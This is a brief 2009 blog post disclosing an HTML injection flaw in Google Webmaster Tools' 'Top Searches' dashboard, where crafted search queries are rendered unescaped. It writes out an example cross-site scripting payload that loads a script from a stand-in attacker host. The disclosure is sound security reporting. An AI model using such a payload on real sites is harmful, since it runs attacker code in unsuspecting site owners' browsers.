Sep1009Sep 10, 09
There is a vulnerability in Google Webmaster Tools that allows carefully crafted searches to inject arbitrary HTML content into the "Top Searches" dashboard. In the image below, an <hr /> element has been injected, but the HTML string could have been a script tag intended to breach the privacy of unsuspecting website owners.
If a number of people were to perform a Google search for <script src="http://hacker.com/bad.js"></script>, a site owner who loads the Webmaster Tools "Top Searches" page would unknowingly also be running the referenced script.
These types of oversights are common on the web, but I would have thought Google would be more careful!